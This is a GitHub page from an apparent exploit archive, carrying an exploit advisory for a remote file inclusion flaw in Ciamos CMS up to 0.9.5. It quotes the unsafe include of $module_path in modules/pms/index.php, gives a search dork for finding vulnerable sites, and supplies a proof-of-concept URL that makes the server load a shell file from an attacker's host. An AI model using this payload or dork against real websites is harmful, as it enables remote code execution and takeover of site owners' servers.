forked from 1979139113/0day-today-exploits
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy path10062.txt
21 lines (15 loc) · 809 Bytes
/
10062.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
Ciamos CMS <= 0.9.5 (module_path) Remote File Inclusion Vulnerability
=====================================================================
########################################################################
#Ciamos CMS <= 0.9.5 (module_path) Remote File Include Vulnerability
#Download Script : http://sourceforge.net/projects/ciamosmodules/files/
#Dork : die("Hacking attempt"); :D
########################################################################
#
#Vuln : ./ciamos/modules/pms/index.php (line 13)
# <?php
# include_once($module_path.'include/header.php');
# ?>
#PoC : http://server/modules/pms/index.php?module_path=http://[attacker]/shell.txt???
#
########################################################################